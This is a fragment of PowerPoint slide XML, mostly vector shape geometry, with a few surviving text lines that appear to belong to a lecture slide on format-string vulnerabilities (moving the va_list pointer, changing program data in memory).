                <a:gd name="T33" fmla="*/ 286 h 388"/>
                <a:gd name="T34" fmla="*/ 199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7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7 h 388"/>
                <a:gd name="T52" fmla="*/ 43 w 226"/>
                <a:gd name="T53" fmla="*/ 31 h 388"/>
                <a:gd name="T54" fmla="*/ 59 w 226"/>
                <a:gd name="T55" fmla="*/ 67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8" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="24"/>
                    <a:pt x="201" y="21"/>
                    <a:pt x="201" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201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8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7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="20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7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7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6" name="Freeform 257">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C21F172-6A1A-4F17-8A9B-8D9B4736F93B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784850" y="2116138"/>
              <a:ext cx="80963" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 129 w 233"/>
                <a:gd name="T1" fmla="*/ 105 h 215"/>
                <a:gd name="T2" fmla="*/ 186 w 233"/>
                <a:gd name="T3" fmla="*/ 31 h 215"/>
                <a:gd name="T4" fmla="*/ 206 w 233"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 227 w 233"/>
                <a:gd name="T7" fmla="*/ 16 h 215"/>
                <a:gd name="T8" fmla="*/ 206 w 233"/>
                <a:gd name="T9" fmla="*/ 0 h 215"/>
                <a:gd name="T10" fmla="*/ 148 w 233"/>
                <a:gd name="T11" fmla="*/ 0 h 215"/>
                <a:gd name="T12" fmla="*/ 128 w 233"/>
                <a:gd name="T13" fmla="*/ 15 h 215"/>
                <a:gd name="T14" fmla="*/ 152 w 233"/>
                <a:gd name="T15" fmla="*/ 31 h 215"/>
                <a:gd name="T16" fmla="*/ 115 w 233"/>
                <a:gd name="T17" fmla="*/ 81 h 215"/>
                <a:gd name="T18" fmla="*/ 77 w 233"/>
                <a:gd name="T19" fmla="*/ 31 h 215"/>
                <a:gd name="T20" fmla="*/ 101 w 233"/>
                <a:gd name="T21" fmla="*/ 15 h 215"/>
                <a:gd name="T22" fmla="*/ 81 w 233"/>
                <a:gd name="T23" fmla="*/ 0 h 215"/>
                <a:gd name="T24" fmla="*/ 23 w 233"/>
                <a:gd name="T25" fmla="*/ 0 h 215"/>
                <a:gd name="T26" fmla="*/ 3 w 233"/>
                <a:gd name="T27" fmla="*/ 16 h 215"/>
                <a:gd name="T28" fmla="*/ 23 w 233"/>
                <a:gd name="T29" fmla="*/ 31 h 215"/>
                <a:gd name="T30" fmla="*/ 43 w 233"/>
                <a:gd name="T31" fmla="*/ 31 h 215"/>
                <a:gd name="T32" fmla="*/ 102 w 233"/>
                <a:gd name="T33" fmla="*/ 105 h 215"/>
                <a:gd name="T34" fmla="*/ 40 w 233"/>
                <a:gd name="T35" fmla="*/ 185 h 215"/>
                <a:gd name="T36" fmla="*/ 20 w 233"/>
                <a:gd name="T37" fmla="*/ 185 h 215"/>
                <a:gd name="T38" fmla="*/ 0 w 233"/>
                <a:gd name="T39" fmla="*/ 200 h 215"/>
                <a:gd name="T40" fmla="*/ 20 w 233"/>
                <a:gd name="T41" fmla="*/ 215 h 215"/>
                <a:gd name="T42" fmla="*/ 78 w 233"/>
                <a:gd name="T43" fmla="*/ 215 h 215"/>
                <a:gd name="T44" fmla="*/ 98 w 233"/>
                <a:gd name="T45" fmla="*/ 200 h 215"/>
                <a:gd name="T46" fmla="*/ 72 w 233"/>
                <a:gd name="T47" fmla="*/ 185 h 215"/>
                <a:gd name="T48" fmla="*/ 115 w 233"/>
                <a:gd name="T49" fmla="*/ 124 h 215"/>
                <a:gd name="T50" fmla="*/ 160 w 233"/>
                <a:gd name="T51" fmla="*/ 185 h 215"/>
                <a:gd name="T52" fmla="*/ 135 w 233"/>
                <a:gd name="T53" fmla="*/ 200 h 215"/>
                <a:gd name="T54" fmla="*/ 155 w 233"/>
                <a:gd name="T55" fmla="*/ 215 h 215"/>
                <a:gd name="T56" fmla="*/ 213 w 233"/>
                <a:gd name="T57" fmla="*/ 215 h 215"/>
                <a:gd name="T58" fmla="*/ 233 w 233"/>
                <a:gd name="T59" fmla="*/ 200 h 215"/>
                <a:gd name="T60" fmla="*/ 213 w 233"/>
                <a:gd name="T61" fmla="*/ 185 h 215"/>
                <a:gd name="T62" fmla="*/ 193 w 233"/>
                <a:gd name="T63" fmla="*/ 185 h 215"/>
                <a:gd name="T64" fmla="*/ 129 w 233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15">
                  <a:moveTo>
                    <a:pt x="129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7" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="31"/>
                    <a:pt x="101" y="31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8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2" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115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3" y="215"/>
                    <a:pt x="233" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233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7" name="Freeform 258">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F06A5DE6-A7F3-4F8C-92AC-B7DECB138EBD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905500" y="2178050"/>
              <a:ext cx="20638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8" name="Freeform 259">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2968DBAE-7CEE-4673-8F44-EEE70CF18902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5967412" y="2062163"/>
              <a:ext cx="77788" cy="158750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39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7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6 w 226"/>
                <a:gd name="T39" fmla="*/ 67 h 388"/>
                <a:gd name="T40" fmla="*/ 43 w 226"/>
                <a:gd name="T41" fmla="*/ 0 h 388"/>
                <a:gd name="T42" fmla="*/ 0 w 226"/>
                <a:gd name="T43" fmla="*/ 67 h 388"/>
                <a:gd name="T44" fmla="*/ 43 w 226"/>
                <a:gd name="T45" fmla="*/ 133 h 388"/>
                <a:gd name="T46" fmla="*/ 86 w 226"/>
                <a:gd name="T47" fmla="*/ 67 h 388"/>
                <a:gd name="T48" fmla="*/ 43 w 226"/>
                <a:gd name="T49" fmla="*/ 102 h 388"/>
                <a:gd name="T50" fmla="*/ 28 w 226"/>
                <a:gd name="T51" fmla="*/ 67 h 388"/>
                <a:gd name="T52" fmla="*/ 43 w 226"/>
                <a:gd name="T53" fmla="*/ 31 h 388"/>
                <a:gd name="T54" fmla="*/ 59 w 226"/>
                <a:gd name="T55" fmla="*/ 67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7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6" y="67"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="28"/>
                    <a:pt x="67" y="0"/>
                    <a:pt x="43" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="0"/>
                    <a:pt x="0" y="29"/>
                    <a:pt x="0" y="67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7" y="133"/>
                    <a:pt x="86" y="104"/>
                    <a:pt x="86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7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7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9" name="Freeform 260">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D200B4D-8FA6-49E7-8C06-1D1FB2D31312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056312" y="2116138"/>
              <a:ext cx="79375" cy="87313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7 w 234"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 227 w 234"/>
                <a:gd name="T7" fmla="*/ 16 h 215"/>
                <a:gd name="T8" fmla="*/ 207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4 w 234"/>
                <a:gd name="T31" fmla="*/ 31 h 215"/>
                <a:gd name="T32" fmla="*/ 102 w 234"/>
                <a:gd name="T33" fmla="*/ 105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7" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="31"/>
                    <a:pt x="227" y="31"/>
                    <a:pt x="227" y="16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4" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102" y="105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0" name="Freeform 261">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC8B0F61-F582-468C-8715-7E6A72AE85D3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175375" y="2178050"/>
              <a:ext cx="22225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1" name="Freeform 262">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96166570-9F0A-4EEC-9C8B-ACBA20190507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6237287" y="2062163"/>
              <a:ext cx="77788" cy="158750"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 198 w 227"/>
                <a:gd name="T1" fmla="*/ 29 h 388"/>
                <a:gd name="T2" fmla="*/ 201 w 227"/>
                <a:gd name="T3" fmla="*/ 18 h 388"/>
                <a:gd name="T4" fmla="*/ 183 w 227"/>
                <a:gd name="T5" fmla="*/ 0 h 388"/>
                <a:gd name="T6" fmla="*/ 165 w 227"/>
                <a:gd name="T7" fmla="*/ 16 h 388"/>
                <a:gd name="T8" fmla="*/ 29 w 227"/>
                <a:gd name="T9" fmla="*/ 359 h 388"/>
                <a:gd name="T10" fmla="*/ 26 w 227"/>
                <a:gd name="T11" fmla="*/ 370 h 388"/>
                <a:gd name="T12" fmla="*/ 44 w 227"/>
                <a:gd name="T13" fmla="*/ 388 h 388"/>
                <a:gd name="T14" fmla="*/ 61 w 227"/>
                <a:gd name="T15" fmla="*/ 373 h 388"/>
                <a:gd name="T16" fmla="*/ 198 w 227"/>
                <a:gd name="T17" fmla="*/ 29 h 388"/>
                <a:gd name="T18" fmla="*/ 227 w 227"/>
                <a:gd name="T19" fmla="*/ 321 h 388"/>
                <a:gd name="T20" fmla="*/ 183 w 227"/>
                <a:gd name="T21" fmla="*/ 255 h 388"/>
                <a:gd name="T22" fmla="*/ 140 w 227"/>
                <a:gd name="T23" fmla="*/ 321 h 388"/>
                <a:gd name="T24" fmla="*/ 183 w 227"/>
                <a:gd name="T25" fmla="*/ 388 h 388"/>
                <a:gd name="T26" fmla="*/ 227 w 227"/>
                <a:gd name="T27" fmla="*/ 321 h 388"/>
                <a:gd name="T28" fmla="*/ 183 w 227"/>
                <a:gd name="T29" fmla="*/ 357 h 388"/>
                <a:gd name="T30" fmla="*/ 168 w 227"/>
                <a:gd name="T31" fmla="*/ 321 h 388"/>
                <a:gd name="T32" fmla="*/ 183 w 227"/>
                <a:gd name="T33" fmla="*/ 286 h 388"/>
                <a:gd name="T34" fmla="*/ 199 w 227"/>
                <a:gd name="T35" fmla="*/ 321 h 388"/>
                <a:gd name="T36" fmla="*/ 183 w 227"/>
                <a:gd name="T37" fmla="*/ 357 h 388"/>
                <a:gd name="T38" fmla="*/ 87 w 227"/>
                <a:gd name="T39" fmla="*/ 67 h 388"/>
                <a:gd name="T40" fmla="*/ 44 w 227"/>
                <a:gd name="T41" fmla="*/ 0 h 388"/>
                <a:gd name="T42" fmla="*/ 0 w 227"/>
                <a:gd name="T43" fmla="*/ 67 h 388"/>
                <a:gd name="T44" fmla="*/ 44 w 227"/>
                <a:gd name="T45" fmla="*/ 133 h 388"/>
                <a:gd name="T46" fmla="*/ 87 w 227"/>
                <a:gd name="T47" fmla="*/ 67 h 388"/>
                <a:gd name="T48" fmla="*/ 44 w 227"/>
                <a:gd name="T49" fmla="*/ 102 h 388"/>
                <a:gd name="T50" fmla="*/ 28 w 227"/>
                <a:gd name="T51" fmla="*/ 67 h 388"/>
                <a:gd name="T52" fmla="*/ 44 w 227"/>
                <a:gd name="T53" fmla="*/ 31 h 388"/>
                <a:gd name="T54" fmla="*/ 59 w 227"/>
                <a:gd name="T55" fmla="*/ 67 h 388"/>
                <a:gd name="T56" fmla="*/ 44 w 227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8">
                  <a:moveTo>
                    <a:pt x="198" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="24"/>
                    <a:pt x="201" y="21"/>
                    <a:pt x="201" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201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4" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="388"/>
                    <a:pt x="59" y="379"/>
                    <a:pt x="61" y="373"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="198" y="29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7" y="358"/>
                    <a:pt x="227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7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7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7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2" name="Freeform 263">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5510667-F7B5-420A-A205-9E001C2A0CD2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326187" y="2116138"/>
              <a:ext cx="80963" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 129 w 234"/>
                <a:gd name="T1" fmla="*/ 105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1 h 215"/>
                <a:gd name="T16" fmla="*/ 115 w 234"/>
                <a:gd name="T17" fmla="*/ 81 h 215"/>
                <a:gd name="T18" fmla="*/ 78 w 234"/>
                <a:gd name="T19" fmla="*/ 31 h 215"/>
                <a:gd name="T20" fmla="*/ 101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5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29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8" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="31"/>
                    <a:pt x="101" y="31"/>
                    <a:pt x="101" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101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5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3" name="Freeform 264">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F1B13D5-04F2-4714-A67D-BB993CBDBB97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446837" y="2178050"/>
              <a:ext cx="20638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0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4" y="62"/>
                    <a:pt x="30" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49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4" name="Freeform 265">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C47CE6-1397-47A2-862D-781507EEC1B9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6508750" y="2062163"/>
              <a:ext cx="77788" cy="158750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39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7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7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7 h 388"/>
                <a:gd name="T52" fmla="*/ 43 w 226"/>
                <a:gd name="T53" fmla="*/ 31 h 388"/>
                <a:gd name="T54" fmla="*/ 59 w 226"/>
                <a:gd name="T55" fmla="*/ 67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7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7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7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7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5" name="Freeform 266">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6712EF63-8AEC-4D16-9E0F-F992973C48C0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6596062" y="2116138"/>
              <a:ext cx="80963" cy="87313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7 w 234"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 227 w 234"/>
                <a:gd name="T7" fmla="*/ 16 h 215"/>
                <a:gd name="T8" fmla="*/ 207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4 w 234"/>
                <a:gd name="T31" fmla="*/ 31 h 215"/>
                <a:gd name="T32" fmla="*/ 103 w 234"/>
                <a:gd name="T33" fmla="*/ 105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7" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="31"/>
                    <a:pt x="227" y="31"/>
                    <a:pt x="227" y="16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90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4" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103" y="105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7" y="215"/>
                    <a:pt x="99" y="215"/>
                    <a:pt x="99" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="185"/>
                    <a:pt x="89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6" name="Freeform 267">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{524C7500-9599-44C0-BE2E-C4522DE5CAE1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6688137" y="2062163"/>
              <a:ext cx="77788" cy="158750"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 197 w 226"/>
                <a:gd name="T1" fmla="*/ 29 h 388"/>
                <a:gd name="T2" fmla="*/ 200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7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39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7 w 226"/>
                <a:gd name="T31" fmla="*/ 321 h 388"/>
                <a:gd name="T32" fmla="*/ 183 w 226"/>
                <a:gd name="T33" fmla="*/ 286 h 388"/>
                <a:gd name="T34" fmla="*/ 198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7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7 h 388"/>
                <a:gd name="T52" fmla="*/ 43 w 226"/>
                <a:gd name="T53" fmla="*/ 31 h 388"/>
                <a:gd name="T54" fmla="*/ 59 w 226"/>
                <a:gd name="T55" fmla="*/ 67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7" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="24"/>
                    <a:pt x="200" y="21"/>
                    <a:pt x="200" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="9"/>
                    <a:pt x="193" y="0"/>
                    <a:pt x="183" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="0"/>
                    <a:pt x="167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7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7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7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7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7" name="Freeform 268">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF8B134-2B08-4AFD-A1F5-043C2043F71A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6773862" y="2114550"/>
              <a:ext cx="87313" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 249"/>
                <a:gd name="T1" fmla="*/ 27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20 w 249"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 42 w 249"/>
                <a:gd name="T11" fmla="*/ 34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8 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 100 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 31 h 218"/>
                <a:gd name="T32" fmla="*/ 172 w 249"/>
                <a:gd name="T33" fmla="*/ 75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8" name="Freeform 269">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60ED5CB6-39CF-4DF8-AD0E-7964928F9FD1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6967537" y="2093913"/>
              <a:ext cx="104775" cy="117475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 296 w 305"/>
                <a:gd name="T1" fmla="*/ 156 h 289"/>
                <a:gd name="T2" fmla="*/ 305 w 305"/>
                <a:gd name="T3" fmla="*/ 145 h 289"/>
                <a:gd name="T4" fmla="*/ 296 w 305"/>
                <a:gd name="T5" fmla="*/ 134 h 289"/>
                <a:gd name="T6" fmla="*/ 19 w 305"/>
                <a:gd name="T7" fmla="*/ 4 h 289"/>
                <a:gd name="T8" fmla="*/ 10 w 305"/>
                <a:gd name="T9" fmla="*/ 0 h 289"/>
                <a:gd name="T10" fmla="*/ 0 w 305"/>
                <a:gd name="T11" fmla="*/ 10 h 289"/>
                <a:gd name="T12" fmla="*/ 10 w 305"/>
                <a:gd name="T13" fmla="*/ 21 h 289"/>
                <a:gd name="T14" fmla="*/ 272 w 305"/>
                <a:gd name="T15" fmla="*/ 145 h 289"/>
                <a:gd name="T16" fmla="*/ 10 w 305"/>
                <a:gd name="T17" fmla="*/ 268 h 289"/>
                <a:gd name="T18" fmla="*/ 0 w 305"/>
                <a:gd name="T19" fmla="*/ 279 h 289"/>
                <a:gd name="T20" fmla="*/ 10 w 305"/>
                <a:gd name="T21" fmla="*/ 289 h 289"/>
                <a:gd name="T22" fmla="*/ 19 w 305"/>
                <a:gd name="T23" fmla="*/ 286 h 289"/>
                <a:gd name="T24" fmla="*/ 296 w 305"/>
                <a:gd name="T25" fmla="*/ 15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296" y="156"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="153"/>
                    <a:pt x="305" y="151"/>
                    <a:pt x="305" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="305" y="139"/>
                    <a:pt x="301" y="136"/>
                    <a:pt x="296" y="134"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19" y="4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4"/>
                    <a:pt x="3" y="17"/>
                    <a:pt x="10" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="272" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="268"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="272"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="285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6"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="296" y="1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9" name="Freeform 270">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77D78987-250B-45AD-8E42-3804DD12E5B6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7189787" y="2078038"/>
              <a:ext cx="65088" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111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1 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 81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1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0" name="Freeform 271">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C4D2B4C-B6F7-4622-A238-13C7308D6F7D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7269162" y="2114550"/>
              <a:ext cx="85725" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76 w 249"/>
                <a:gd name="T1" fmla="*/ 27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19 w 249"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 42 w 249"/>
                <a:gd name="T11" fmla="*/ 34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19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8 h 218"/>
                <a:gd name="T26" fmla="*/ 76 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 76 w 249"/>
                <a:gd name="T29" fmla="*/ 100 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 31 h 218"/>
                <a:gd name="T32" fmla="*/ 172 w 249"/>
                <a:gd name="T33" fmla="*/ 75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8 h 218"/>
                <a:gd name="T48" fmla="*/ 206 w 249"/>
                <a:gd name="T49" fmla="*/ 188 h 218"/>
                <a:gd name="T50" fmla="*/ 206 w 249"/>
                <a:gd name="T51" fmla="*/ 72 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 249"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 76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7"/>
                  </a:move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2" y="34"/>
                    <a:pt x="19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1" name="Freeform 272">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7201EFD8-334F-4B37-9151-A1392F4F203E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7359650" y="2114550"/>
              <a:ext cx="80963" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 237"/>
                <a:gd name="T1" fmla="*/ 87 h 329"/>
                <a:gd name="T2" fmla="*/ 137 w 237"/>
                <a:gd name="T3" fmla="*/ 31 h 329"/>
                <a:gd name="T4" fmla="*/ 203 w 237"/>
                <a:gd name="T5" fmla="*/ 111 h 329"/>
                <a:gd name="T6" fmla="*/ 133 w 237"/>
                <a:gd name="T7" fmla="*/ 191 h 329"/>
                <a:gd name="T8" fmla="*/ 77 w 237"/>
                <a:gd name="T9" fmla="*/ 123 h 329"/>
                <a:gd name="T10" fmla="*/ 77 w 237"/>
                <a:gd name="T11" fmla="*/ 87 h 329"/>
                <a:gd name="T12" fmla="*/ 77 w 237"/>
                <a:gd name="T13" fmla="*/ 196 h 329"/>
                <a:gd name="T14" fmla="*/ 135 w 237"/>
                <a:gd name="T15" fmla="*/ 221 h 329"/>
                <a:gd name="T16" fmla="*/ 237 w 237"/>
                <a:gd name="T17" fmla="*/ 111 h 329"/>
                <a:gd name="T18" fmla="*/ 140 w 237"/>
                <a:gd name="T19" fmla="*/ 0 h 329"/>
                <a:gd name="T20" fmla="*/ 77 w 237"/>
                <a:gd name="T21" fmla="*/ 25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9 h 329"/>
                <a:gd name="T34" fmla="*/ 20 w 237"/>
                <a:gd name="T35" fmla="*/ 299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9 w 237"/>
                <a:gd name="T45" fmla="*/ 299 h 329"/>
                <a:gd name="T46" fmla="*/ 77 w 237"/>
                <a:gd name="T47" fmla="*/ 299 h 329"/>
                <a:gd name="T48" fmla="*/ 77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7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1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7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7" y="174"/>
                    <a:pt x="237" y="111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0" y="299"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13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7" y="299"/>
                    <a:pt x="99" y="299"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="299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2" name="Freeform 273">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C48A1517-BF6B-4BB9-BE23-B3869AC87EA2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7450137" y="2116138"/>
              <a:ext cx="85725" cy="88900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8 w 249"/>
                <a:gd name="T5" fmla="*/ 215 h 218"/>
                <a:gd name="T6" fmla="*/ 249 w 249"/>
                <a:gd name="T7" fmla="*/ 200 h 218"/>
                <a:gd name="T8" fmla="*/ 229 w 249"/>
                <a:gd name="T9" fmla="*/ 185 h 218"/>
                <a:gd name="T10" fmla="*/ 206 w 249"/>
                <a:gd name="T11" fmla="*/ 185 h 218"/>
                <a:gd name="T12" fmla="*/ 206 w 249"/>
                <a:gd name="T13" fmla="*/ 21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6 h 218"/>
                <a:gd name="T20" fmla="*/ 150 w 249"/>
                <a:gd name="T21" fmla="*/ 31 h 218"/>
                <a:gd name="T22" fmla="*/ 172 w 249"/>
                <a:gd name="T23" fmla="*/ 31 h 218"/>
                <a:gd name="T24" fmla="*/ 172 w 249"/>
                <a:gd name="T25" fmla="*/ 137 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 76 w 249"/>
                <a:gd name="T29" fmla="*/ 155 h 218"/>
                <a:gd name="T30" fmla="*/ 76 w 249"/>
                <a:gd name="T31" fmla="*/ 21 h 218"/>
                <a:gd name="T32" fmla="*/ 56 w 249"/>
                <a:gd name="T33" fmla="*/ 0 h 218"/>
                <a:gd name="T34" fmla="*/ 20 w 249"/>
                <a:gd name="T35" fmla="*/ 0 h 218"/>
                <a:gd name="T36" fmla="*/ 0 w 249"/>
                <a:gd name="T37" fmla="*/ 16 h 218"/>
                <a:gd name="T38" fmla="*/ 20 w 249"/>
                <a:gd name="T39" fmla="*/ 31 h 218"/>
                <a:gd name="T40" fmla="*/ 42 w 249"/>
                <a:gd name="T41" fmla="*/ 31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200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="185"/>
                    <a:pt x="236" y="185"/>
                    <a:pt x="229" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="206" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="5"/>
                    <a:pt x="203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6" y="188"/>
                    <a:pt x="76" y="171"/>
                    <a:pt x="76" y="155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3" name="Freeform 274">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D7157FF-2B6C-4072-90C8-2235FA5B6A99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7542212" y="2090738"/>
              <a:ext cx="73025" cy="114300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200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19 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 63 w 211"/>
                <a:gd name="T25" fmla="*/ 92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7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1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19" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63" y="92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37609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2FC-C2EF-4EF7-B551-7B29B448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Change program’s data in the memory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A552-27C6-48BE-8084-2405372C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5480230" cy="376310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’s address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US" dirty="0"/>
              <a:t>) is on the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Goal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> : To move the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
